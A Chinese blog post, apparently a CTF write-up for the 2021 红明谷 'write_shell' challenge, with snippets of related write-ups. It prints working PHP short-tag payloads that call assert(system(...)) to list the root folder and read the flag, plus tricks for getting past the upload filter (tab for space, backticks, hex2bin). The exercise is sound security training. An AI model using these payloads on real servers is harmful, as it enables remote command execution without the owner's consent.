[红明谷CTF 2021]write_shell --不会编程的崽

最新推荐文章于 2024-03-04 21:29:12 发布
最新推荐文章于 2024-03-04 21:29:12 发布
阅读量578 收藏 8
点赞数 14
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/daimakunnanhu/article/details/136188762
版权
本文介绍了如何通过分析上传文件过程中的漏洞,利用MD5加密绕过过滤规则,实现命令执行,最终在root目录下获取flag。作者详细展示了从上传原理到利用payload获取flag的整个过程。
摘要由CSDN通过智能技术生成

今天这个也挺简单的。开始上源码

看见了upload。文件上传??

大概含义是选择upload,然后传入data,并将data写入index.php。先访问一下upload吧

?action=upload&data=1

 上传成功。

找到上传路径。源码上写md5加密的remoteaddr,然后又去找外网ip,结果没啥结果。。。但其实路径就在action这

?action=pwd

 

路径和上传原理搞清楚了。开始绕preg_match

过滤还算比较少,主要是空格,"_","php"被过滤了 

"=" 代替 "php"

"%09" 代替 空格

但是"_"怎么被替换呢?因为这玩意涉及到一句话木马。所以,不用不就不需要绕过了。

命令执行也不是不行。 

?action=upload&data=<?=%09assert(system("ls%09/"))?>

没有拦截,访问index.php

 

flag就在根目录下

?action=upload&data=<?=%09assert(system("cat%09/flllllll1112222222lag"))?>

再上述payload,最后访问index.php就拿到flag了 

不会编程的崽
关注
  • 14
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
大数据-算法-朝鲜数学的儒学化倾向.pdf
04-18
作者崔锡鼎,字明谷,号锡鼎,是李朝肃宗时期的大臣,著有《经世正韵图说》和《明谷集》,并编纂了《左氏辑选》。这一部分还简要介绍了崔锡鼎所处时代的党派冲突,并参考了《李朝实录》中关于他的相关记载。 第二...
[红明谷CTF 2021]write_shell
cjdgg的博客
06-25 1558
[红明谷CTF 2021]write_shell 题目直接给出了源代码,看了一下源代码,利用点应该就是利用file_get_contents函数写shell获取我们需要的信息 在此之前我们还需要找到要写入shell的文件路径,这时我们可以发现可以通过?action=pwd进行查看 ...
[红明谷CTF 2021]write_shell1
最新发布
wwwyyyxxxx的博客
03-04 396
换行绕过也不行,check函数虽然看着过滤的不多,但是一些关键的被过滤了,让写入空的php文件但是又把分号过滤了,这里在本地试了一下,发现短标签不需要分号,但是这样在本地会莫名其妙的输出1,有没有大佬解释一下。但是想传system("ls /")的时候又有个问题是空格被过滤了,这里要用到一个函数是hen2bin()将十六进制转换为二进制编码后的字符串,ls / 十六进制编码是6C73202F。这里check函数是嵌套在waf里面的,waf嵌套做了一个数组的判断,而check才是真正的waf。
红明谷杯数据安全大赛
qq_53755216的博客
04-04 296
write_shell <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ retur
BUUCTF--[红明谷CTF 2021]write_shell
qq_46263951的博客
07-21 1103
补充知识点: PHP中??的作用 $a??$b; $a是不是null,如果不为null,则返回$a,否则返回$b; PHP中的短标签 先来看第一部分代码, 当action=pwd时则给出路径;当action=upload时,可以上传参数data $dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/'; if(!file_exists($dir)){ mkdir($dir); } switch($_GET["action"] ?
红明谷“ 初赛 web 部分WP
feng的博客
04-03 1395
前言 参加了第一届红明谷的比赛,4道web当时只做出2道,第三道苦于那个数据库的密码不知道,赛后才问了别的师傅才知道是123456这个弱密码。。。草了。 因为实在太懒了。。。本来不想专门写这篇WP的,因为当时做题的时候只潦草的记下了当时的wp,用的姿势可能还不是最简便的方式。但是想想,不写的话总感觉缺了点什么,所以就把我当时潦草的wp记录给复制粘贴过来了(笑),见谅见谅。 happysql ban了单引号,但是查询的语句中用的是双引号,拿双引号闭合,如果登录成功的会302跳转到home.php,因此可以布尔
BUUCTF:[红明谷CTF 2021]write_shell --- php 短标签 + 反引号执行 写入马儿的新方法 --- rce,,yi
Zero_Adam的博客
04-12 1358
一、自己做 data传入值,然后data过waf()。data的值,就是我们写文件的内容,应该就是写马儿了。过滤了php的话,考虑短标签把,然后eval没了, assert或者exec其他的应该都大差不差。 然后就卡壳了,,本地环境打好了,,但是 assert或者exec这些不会用。。 看WP了 二、学到的 PHP短标签:<?php @eval($_POST['a']);?>可以用<?=@eval($_POST['a']);?>代替,PHP短标签 关于PHP的??这个东西:讲
[红明谷CTF 2021]write_shell 1
m0_62879498的博客
05-28 959
进入环境,首先进行代码审计 代码审计 <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ .
BUUCTF-[红明谷CTF 2021]write_shell
qq_24033605的博客
11-02 528
[红明谷CTF 2021]write_shell 源码放出来了,直接进行代码审计: 从action出发,有两个功能,一是执行pwd,功能是显示当前目录,二是上传upload,通过data变量执行get传参,这里设置了一个waf,对data的内容进行了过滤。 首先进行pwd操作,查看当前目录: 接下来构建shell,这里过滤了php,所以使用短标签<?=?>,过滤了空格,使用\t替换,过滤了eval,使用`执行命令打开根目录下所有文件: /?action=upload&data=&lt
2021红明谷杯数据安全大赛技能场景赛-Writeup
末初的CSDN博客
04-03 6974
文章目录Webwrite_shellhappysqleasytpjavawebMisc签到InputMonitor我的心是冰冰的歪比歪比babytraffic 后续题目知道怎么做了,跟进复现会把wp补上 Web write_shell 第一步主要考察PHP代码执行,第一步先写个phpinfo()看下情况。利用php的一种短标签可以绕过分号,然后拼接一下绕过php字样。 /?action=upload&data=<?=(p.hpinfo)()?> 沙盒路径?action=pwd
DVCTF 2021 部分writeup
YuSec
03-16 857
Start 0x01 Crypto-Bootless RSA {"N": 148818474926605063920889194160313225216327492347368329952620222220173505969004341728021623813340175402441807560635794342531823708335067243413446678485411066531733814714571491348985375389581214154895499404668547123130986

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值